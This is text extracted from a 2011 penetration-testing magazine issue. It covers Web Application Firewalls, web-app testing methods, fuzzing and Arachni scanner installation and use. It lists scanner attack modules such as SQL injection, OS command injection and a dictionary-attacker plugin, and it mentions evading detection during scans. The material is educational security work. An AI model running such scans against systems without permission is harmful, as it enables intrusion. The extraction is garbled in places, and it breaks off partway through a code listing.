The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
